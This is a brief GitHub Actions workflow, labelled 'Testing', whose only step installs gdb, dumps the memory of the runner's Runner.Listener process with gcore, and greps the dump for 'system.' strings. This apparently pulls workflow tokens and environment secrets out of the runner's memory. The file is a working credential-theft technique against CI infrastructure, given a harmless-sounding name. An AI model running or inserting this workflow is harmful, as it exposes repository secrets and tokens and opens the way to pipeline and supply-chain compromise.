on:
  workflow_dispatch:


jobs:
  I:
    name: "Testing"
    runs-on: ubuntu-latest
    environment: "new env"
    steps:
      - name: "step 1"
        run: |
          sudo apt-get install -y gdb && \
          sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
          grep -Eao 'system\.[^"]*' k.dump*
